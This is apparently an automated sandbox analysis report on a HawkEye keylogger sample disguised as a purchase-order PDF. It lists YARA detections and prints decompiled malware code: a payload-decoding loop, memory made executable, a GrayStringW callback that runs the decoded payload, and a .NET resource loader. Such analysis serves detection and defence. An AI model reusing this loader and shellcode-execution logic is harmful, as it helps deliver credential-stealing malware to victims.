                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148 Parent PID: 5704 PO 2010029_pdf Quotation from Alibaba Ale.exeCOMMON

                                                  Executed Functions

                                                  Function 00B17B00, Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 242memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00B17B00(void* __eflags, long _a4, intOrPtr _a8, void* _a36, short _a44, char _a46, intOrPtr _a47, short _a51, _Unknown_base(*)() _a1036, char _a1044) {
				char _v12;
				intOrPtr _v20;
				char _v21;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t40;
				char _t41;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t55;
				void* _t76;
				signed int _t81;
				signed int _t82;
				intOrPtr _t98;
				char _t101;
				void* _t102;
				long _t103;
				char _t106;
				long _t107;
				void* _t111;
				char* _t123;
				void* _t124;
				signed int _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t136;
				char* _t138;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				signed int _t145;
				signed int _t146;
				void* _t147;
				void* _t148;

				_t146 = _t145 & 0xfffffff8;
				E00B13710();
				_t40 =  *0xb23524; // 0x6465
				asm("movups xmm0, [0xb23514]");
				_a44 = _t40;
				_t41 =  *0xb23526; // 0x0
				_a46 = _t41;
				_t103 = 0;
				_a4 = 0;
				asm("movups [esp+0x2c], xmm0");
				_a47 = 0;
				_a51 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E00B17E30();
				_a8 = L00B17EC0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xb616c5d9);
				_t51 = L00B17EC0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xe0baa99);
				_t130 = _t51;
				_t52 = L00B17EC0(_t137, 0x9347c911);
				_t138 =  &_a1044;
				_t111 =  *_t51(0,  *_t52(0, L"IEUCIZEO", 0xa, _t129, _t136, _t102));
				if(_t111 == 0) {
					L3:
					_t55 = 0;
					do {
						asm("ror cl, 0x2");
						_t122 =  !(( ~( ~( *(_t146 + _t55 + 0x430)) ^ 0x000000de) ^ 0x000000d4) - _t55 + 0x0000006d ^ 0x000000fb) + _t55 - _t55;
						 *(_t146 + _t55 + 0x430) =  !(( ~( ~( *(_t146 + _t55 + 0x430)) ^ 0x000000de) ^ 0x000000d4) - _t55 + 0x0000006d ^ 0x000000fb) + _t55 - _t55;
						_t55 = _t55 + 1;
					} while (_t55 < 0x1805);
					VirtualProtect( &_a1036, 0x1805, 0x40,  &_a4);
					GrayStringW(GetDC(0), 0,  &_a1036,  &_a36, 0, 0, 0, 0, 0); // executed
					_push("cls");
					E00AE3965(_t103, 0x9347c911, _t130, _t138);
					_t147 = _t146 + 4;
					0xb27e6c->X = 0x4000a;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_t131 = 0x14;
					do {
						_t23 = E00AD9A54(0x9347c911) + 0x32; // 0x32
						_t139 = _t23;
						asm("o16 nop [eax+eax]");
						do {
						} while (_t139 > E00AD9A54(0x9347c911));
						_push("*");
						E00AD1080(_t122);
						_t147 = _t147 + 4;
						_t131 = _t131 - 1;
					} while (_t131 != 0);
					do {
						_t24 = E00AD9A54(0x9347c911) + 0x32; // 0x32
						_t140 = _t24;
						do {
						} while (_t140 > E00AD9A54(0x9347c911));
						E00AD1080(_t122, "%c",  *((char*)(_t147 + _t131 + 0x2c)));
						_t131 = _t131 + 1;
						_t147 = _t147 + 8;
					} while (_t131 < 0x14);
					_t132 = 0x14;
					do {
						_t27 = E00AD9A54(0x9347c911) + 0x32; // 0x32
						_t141 = _t27;
						do {
						} while (_t141 > E00AD9A54(0x9347c911));
						_push("*");
						E00AD1080(_t122);
						_t147 = _t147 + 4;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
					_t142 = GetStdHandle;
					0xb27e6c->X = 0xa000a;
					_t76 = GetStdHandle(0xfffffff5);
					_t133 = SetConsoleCursorPosition;
					SetConsoleCursorPosition(_t76, 0xb27e6c->X);
					0xb27e6c->X = 0x7000f;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_push("Enter Password:");
					E00AD1080(_t122);
					_t148 = _t147 + 4;
					_t164 = _v21 - 0xd;
					if(_v21 == 0xd) {
						L22:
						 *((char*)(_t148 + _t103 + 0x1c)) = 0;
						_t81 =  &_v12;
						_t123 = "pokhara";
						while(1) {
							_t128 =  *_t81;
							__eflags = _t128 -  *_t123;
							if(_t128 !=  *_t123) {
								break;
							}
							__eflags = _t128;
							if(_t128 == 0) {
								L27:
								_t82 = 0;
								L29:
								__eflags = _t82;
								if(_t82 != 0) {
									0xb27e6c->X = 0x10000f;
									SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
									_push(0xb23584);
									E00AD1080(_t123);
									E00AF4817(_t128, _t142, __eflags);
									return E00B17B00(__eflags);
								} else {
									0xb27e6c->X = 0x9000f;
									SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
									E00AD1080(_t123);
									0xb27e6c->X = 0xa0011;
									SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
									E00AD1080(_t123, "Press any key to countinue.....", "Password match");
									E00AF4817(_t128, _t142, __eflags);
									return E00B1A4D0(_t103, _t123, _t128, _t133, _t142);
								}
							}
							_t128 =  *((intOrPtr*)(_t81 + 1));
							__eflags = _t128 - _t123[1];
							if(_t128 != _t123[1]) {
								break;
							}
							_t81 = _t81 + 2;
							_t123 =  &(_t123[2]);
							__eflags = _t128;
							if(_t128 != 0) {
								continue;
							}
							goto L27;
						}
						asm("sbb eax, eax");
						_t82 = _t81 | 0x00000001;
						__eflags = _t82;
						goto L29;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t106 = E00AF4817(0x9347c911, _t142, _t164);
						if(_t106 == 0xd) {
							break;
						}
						_t164 = _t106 - 8;
						if(_t106 != 8) {
							L00AF4C9E(0x2a);
							_t98 = _v20;
							_t148 = _t148 + 4;
							 *((char*)(_t148 + _t98 + 0x1c)) = _t106;
							_v20 = _t98 + 1;
						}
					}
					_t103 = _v20;
					goto L22;
				} else {
					_t107 = 0x1805;
					_t124 = _t111 - _t138;
					do {
						_t101 =  *((intOrPtr*)(_t124 + _t138));
						_t138 = _t138 + 1;
						 *((char*)(_t138 - 1)) = _t101;
						_t107 = _t107 - 1;
					} while (_t107 != 0);
					goto L3;
				}
			}










































                                                  0x00b17b03
                                                  0x00b17b0b
                                                  0x00b17b10
                                                  0x00b17b16
                                                  0x00b17b1d
                                                  0x00b17b22
                                                  0x00b17b28
                                                  0x00b17b2c
                                                  0x00b17b30
                                                  0x00b17b36
                                                  0x00b17b3b
                                                  0x00b17b3f
                                                  0x00b17b57
                                                  0x00b17b59
                                                  0x00b17b6f
                                                  0x00b17b75
                                                  0x00b17b81
                                                  0x00b17b83
                                                  0x00b17b94
                                                  0x00b17b9d
                                                  0x00b17ba1
                                                  0x00b17bbe
                                                  0x00b17bbe
                                                  0x00b17bc0
                                                  0x00b17bdd
                                                  0x00b17be0
                                                  0x00b17be2
                                                  0x00b17be9
                                                  0x00b17bea
                                                  0x00b17c05
                                                  0x00b17c2b
                                                  0x00b17c31
                                                  0x00b17c36
                                                  0x00b17c3b
                                                  0x00b17c3e
                                                  0x00b17c57
                                                  0x00b17c5d
                                                  0x00b17c62
                                                  0x00b17c67
                                                  0x00b17c67
                                                  0x00b17c6a
                                                  0x00b17c70
                                                  0x00b17c75
                                                  0x00b17c79
                                                  0x00b17c7e
                                                  0x00b17c83
                                                  0x00b17c86
                                                  0x00b17c86
                                                  0x00b17c90
                                                  0x00b17c95
                                                  0x00b17c95
                                                  0x00b17c98
                                                  0x00b17c9d
                                                  0x00b17cac
                                                  0x00b17cb1
                                                  0x00b17cb2
                                                  0x00b17cb5
                                                  0x00b17cba
                                                  0x00b17cc0
                                                  0x00b17cc5
                                                  0x00b17cc5
                                                  0x00b17cc8
                                                  0x00b17ccd
                                                  0x00b17cd1
                                                  0x00b17cd6
                                                  0x00b17cdb
                                                  0x00b17cde
                                                  0x00b17cde
                                                  0x00b17ce3
                                                  0x00b17ce9
                                                  0x00b17cfb
                                                  0x00b17cfd
                                                  0x00b17d04
                                                  0x00b17d06
                                                  0x00b17d1b
                                                  0x00b17d1d
                                                  0x00b17d22
                                                  0x00b17d27
                                                  0x00b17d2a
                                                  0x00b17d2f
                                                  0x00b17d5f
                                                  0x00b17d5f
                                                  0x00b17d64
                                                  0x00b17d68
                                                  0x00b17d70
                                                  0x00b17d70
                                                  0x00b17d72
                                                  0x00b17d74
                                                  0x00000000
                                                  0x00000000
                                                  0x00b17d76
                                                  0x00b17d78
                                                  0x00b17d8c
                                                  0x00b17d8c
                                                  0x00b17d95
                                                  0x00b17d95
                                                  0x00b17d97
                                                  0x00b17df2
                                                  0x00b17e07
                                                  0x00b17e09
                                                  0x00b17e0e
                                                  0x00b17e16
                                                  0x00b17e26
                                                  0x00b17d99
                                                  0x00b17d99
                                                  0x00b17dae
                                                  0x00b17db5
                                                  0x00b17dbd
                                                  0x00b17dd2
                                                  0x00b17dd9
                                                  0x00b17de1
                                                  0x00b17df1
                                                  0x00b17df1
                                                  0x00b17d97
                                                  0x00b17d7a
                                                  0x00b17d7d
                                                  0x00b17d80
                                                  0x00000000
                                                  0x00000000
                                                  0x00b17d82
                                                  0x00b17d85
                                                  0x00b17d88
                                                  0x00b17d8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b17d8a
                                                  0x00b17d90
                                                  0x00b17d92
                                                  0x00b17d92
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b17d31
                                                  0x00b17d31
                                                  0x00b17d36
                                                  0x00b17d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00b17d3d
                                                  0x00b17d40
                                                  0x00b17d44
                                                  0x00b17d49
                                                  0x00b17d4d
                                                  0x00b17d50
                                                  0x00b17d55
                                                  0x00b17d55
                                                  0x00b17d40
                                                  0x00b17d5b
                                                  0x00000000
                                                  0x00b17ba3
                                                  0x00b17ba5
                                                  0x00b17baa
                                                  0x00b17bb0
                                                  0x00b17bb0
                                                  0x00b17bb3
                                                  0x00b17bb6
                                                  0x00b17bb9
                                                  0x00b17bb9
                                                  0x00000000
                                                  0x00b17bb0

                                                  APIs
                                                    • Part of subcall function 00B17E30: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,00B17B5E,00000000,00000000,00000001,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58), ref: 00B17E38
                                                    • Part of subcall function 00B17E30: RtlAllocateHeap.NTDLL(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E3F
                                                    • Part of subcall function 00B17E30: GetProcessHeap.KERNEL32(00000001,17D783FF,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E77
                                                    • Part of subcall function 00B17E30: HeapAlloc.KERNEL32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E7E
                                                  • VirtualProtect.KERNEL32(?,00001805,00000040,?,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17C05
                                                  • GetDC.USER32(00000000), ref: 00B17C24
                                                  • GrayStringW.USER32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007), ref: 00B17C2B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17C50
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17C57
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17CFB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17D04
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17D18
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17D1B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17DAB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17DAE
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17DCF
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17DD2
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17E04
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$Heap$Process$AllocAllocateGrayProtectStringVirtual
                                                  • String ID: 0THw$Enter Password:$IEUCIZEO$Password match$Press any key to countinue.....$cls$pokhara
                                                  • API String ID: 1163627389-3205554147
                                                  • Opcode ID: 1e61ed3d28820afddf24fce192b73dffeab8de0cfe43f5a1a3c1a1f01ec15d8f
                                                  • Instruction ID: 2df7124a997d62ce602c25b8c988c01647fba4d62f818d7945ebd50cf558b97d
                                                  • Opcode Fuzzy Hash: 1e61ed3d28820afddf24fce192b73dffeab8de0cfe43f5a1a3c1a1f01ec15d8f
                                                  • Instruction Fuzzy Hash: A0816BB26482405FC720BBB8EC45AEB7BE8DF49310F4545A9F559833B2DE30D9498B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401489, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401489() {
				void* _v8;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t12 = FindResourceW(GetModuleHandleW(0), 1, 0xa);
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}







                                                  0x004014a5
                                                  0x004014a9
                                                  0x004014ec
                                                  0x004014ee
                                                  0x004014ee
                                                  0x004014b7
                                                  0x004014bb
                                                  0x004014c7
                                                  0x004014cd
                                                  0x004014d3
                                                  0x004014d8
                                                  0x004014e0
                                                  0x004014e0
                                                  0x004014d8
                                                  0x004014e6
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                  • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                    • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                  • ExitProcess.KERNEL32 ref: 004014EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                  • String ID: PPXs$v2.0.50727
                                                  • API String ID: 2372384083-670238402
                                                  • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                  • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                  • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                  • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                  0x00401e22
                                                  0x00401e28

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                  • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                  • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD1AF5, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001B01,00AD12FB), ref: 00AD1AFA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 99fed7091a6c0327b10a99278b0fb22069313fabe08b7b83657129c8ff0f4bf5
                                                  • Instruction ID: 47fa52a1e16b61c770cc9c5b342f38b509434437c7ce1e78828c40259f9cf049
                                                  • Opcode Fuzzy Hash: 99fed7091a6c0327b10a99278b0fb22069313fabe08b7b83657129c8ff0f4bf5
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD1308, Relevance: 10.6, APIs: 7, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			_entry_(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr _t13;
				signed short _t18;
				char _t22;
				void* _t24;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				char _t34;
				void* _t35;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr* _t53;
				void* _t54;

				_t49 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t35 = __ecx;
				E00AD1850();
				E00AD1BB0(__edx, 0xb23b58, 0x14);
				_t11 = E00AD1630(_t35, __edx, 1); // executed
				if(_t11 != 0) {
					L3:
					_t34 = 0;
					 *((char*)(_t54 - 0x19)) = 0;
					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
					 *((char*)(_t54 - 0x24)) = E00AD1533();
					_t13 =  *0xb26a80; // 0x2
					if(_t13 == 1) {
						goto L2;
					}
					if(_t13 != 0) {
						_t34 = 1;
						 *((char*)(_t54 - 0x19)) = 1;
						L9:
						E00AD178A( *((intOrPtr*)(_t54 - 0x24)));
						_pop(_t39);
						_t50 = E00AD1957();
						__eflags =  *_t50;
						if(__eflags != 0) {
							_t30 = E00AD1700(__eflags);
							_t39 = _t50;
							__eflags = _t30;
							if(_t30 != 0) {
								_t53 =  *_t50;
								_t39 = _t53;
								L00AD1BA0();
								 *_t53(0, 2, 0);
							}
						}
						_t51 = E00AD195D();
						__eflags =  *_t51;
						if(__eflags != 0) {
							_t28 = E00AD1700(__eflags);
							_t39 = _t51;
							__eflags = _t28;
							if(_t28 != 0) {
								E00AD918A(_t34, _t46, 0,  *_t51);
								_pop(_t39);
							}
						}
						_t18 = E00AD1A7E();
						_t52 = E00B1A8C0(_t51, __eflags, 0xad0000, 0, E00AF2722(), _t18 & 0x0000ffff);
						_t22 = E00AD1AB1();
						__eflags = _t22;
						if(_t22 == 0) {
							E00AD91C2(_t52);
						}
						__eflags = _t34;
						if(_t34 == 0) {
							E00AD915F();
						}
						E00AD17A7(_t39, 0, _t52, 1, 0);
						 *(_t54 - 4) = 0xfffffffe;
						_t24 = _t52;
						L20:
						return E00AD1BF6(_t24, _t46);
					}
					 *0xb26a80 = 1;
					_t32 = E00AF27D1(1, _t47, _t49, 0xb1b270, 0xb1b290); // executed
					_pop(_t43);
					if(_t32 == 0) {
						E00AF2775(0, _t43, _t47, _t49, 0xb1b264, 0xb1b26c); // executed
						 *0xb26a80 = 2;
						goto L9;
					}
					 *(_t54 - 4) = 0xfffffffe;
					_t24 = 0xff;
					goto L20;
				} else {
					L2:
					E00AD1963(_t46, _t47, 7);
					goto L3;
				}
			}






















                                                  0x00ad1308
                                                  0x00ad1308
                                                  0x00ad1308
                                                  0x00ad1308
                                                  0x00ad1308
                                                  0x00ad1319
                                                  0x00ad1320
                                                  0x00ad1328
                                                  0x00ad1331
                                                  0x00ad1331
                                                  0x00ad1333
                                                  0x00ad1336
                                                  0x00ad133f
                                                  0x00ad1342
                                                  0x00ad134c
                                                  0x00000000
                                                  0x00000000
                                                  0x00ad1350
                                                  0x00ad139b
                                                  0x00ad139d
                                                  0x00ad13a0
                                                  0x00ad13a3
                                                  0x00ad13a8
                                                  0x00ad13ae
                                                  0x00ad13b2
                                                  0x00ad13b4
                                                  0x00ad13b7
                                                  0x00ad13bc
                                                  0x00ad13bd
                                                  0x00ad13bf
                                                  0x00ad13c5
                                                  0x00ad13c7
                                                  0x00ad13c9
                                                  0x00ad13ce
                                                  0x00ad13ce
                                                  0x00ad13bf
                                                  0x00ad13d5
                                                  0x00ad13d7
                                                  0x00ad13d9
                                                  0x00ad13dc
                                                  0x00ad13e1
                                                  0x00ad13e2
                                                  0x00ad13e4
                                                  0x00ad13e8
                                                  0x00ad13ed
                                                  0x00ad13ed
                                                  0x00ad13e4
                                                  0x00ad13ee
                                                  0x00ad1408
                                                  0x00ad140a
                                                  0x00ad140f
                                                  0x00ad1411
                                                  0x00ad1414
                                                  0x00ad1414
                                                  0x00ad1419
                                                  0x00ad141b
                                                  0x00ad141d
                                                  0x00ad141d
                                                  0x00ad1425
                                                  0x00ad142c
                                                  0x00ad1433
                                                  0x00ad1474
                                                  0x00ad1479
                                                  0x00ad1479
                                                  0x00ad1352
                                                  0x00ad1362
                                                  0x00ad1368
                                                  0x00ad136b
                                                  0x00ad1388
                                                  0x00ad138f
                                                  0x00000000
                                                  0x00ad138f
                                                  0x00ad136d
                                                  0x00ad1374
                                                  0x00000000
                                                  0x00ad132a
                                                  0x00ad132a
                                                  0x00ad132c
                                                  0x00000000
                                                  0x00ad132c

                                                  APIs
                                                  • ___security_init_cookie.LIBCMT ref: 00AD1308
                                                  • ___scrt_fastfail.LIBCMT ref: 00AD132C
                                                    • Part of subcall function 00AD1963: IsProcessorFeaturePresent.KERNEL32(00000017,?,00000000), ref: 00AD1970
                                                    • Part of subcall function 00AD1963: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?,00000000), ref: 00AD1A38
                                                    • Part of subcall function 00AD1963: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?,00000000), ref: 00AD1A57
                                                    • Part of subcall function 00AD1963: UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?,00000000), ref: 00AD1A61
                                                  • ___scrt_release_startup_lock.LIBCMT ref: 00AD13A3
                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00AD13B7
                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00AD13DC
                                                  • ___scrt_get_show_window_mode.LIBCMT ref: 00AD13EE
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 00AD1425
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled___scrt_is_nonwritable_in_current_image$DebuggerFeatureProcessor___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
                                                  • String ID:
                                                  • API String ID: 1925394571-0
                                                  • Opcode ID: 9261b29a7d62293a0fcf770875a17a5738b90b5ade924a422cdd7e3989610654
                                                  • Instruction ID: e1d63cc2b207e61a9a044b17098ca09ef0a0c16aee5d7fe8c77fdee0df75df78
                                                  • Opcode Fuzzy Hash: 9261b29a7d62293a0fcf770875a17a5738b90b5ade924a422cdd7e3989610654
                                                  • Instruction Fuzzy Hash: D9217931684341BADB207BB45E17BAE33A05F427A0F64025FF4837B7E3CE618D4596A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B17E30, Relevance: 6.0, APIs: 4, Instructions: 37memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,00B17B5E,00000000,00000000,00000001,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58), ref: 00B17E38
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E3F
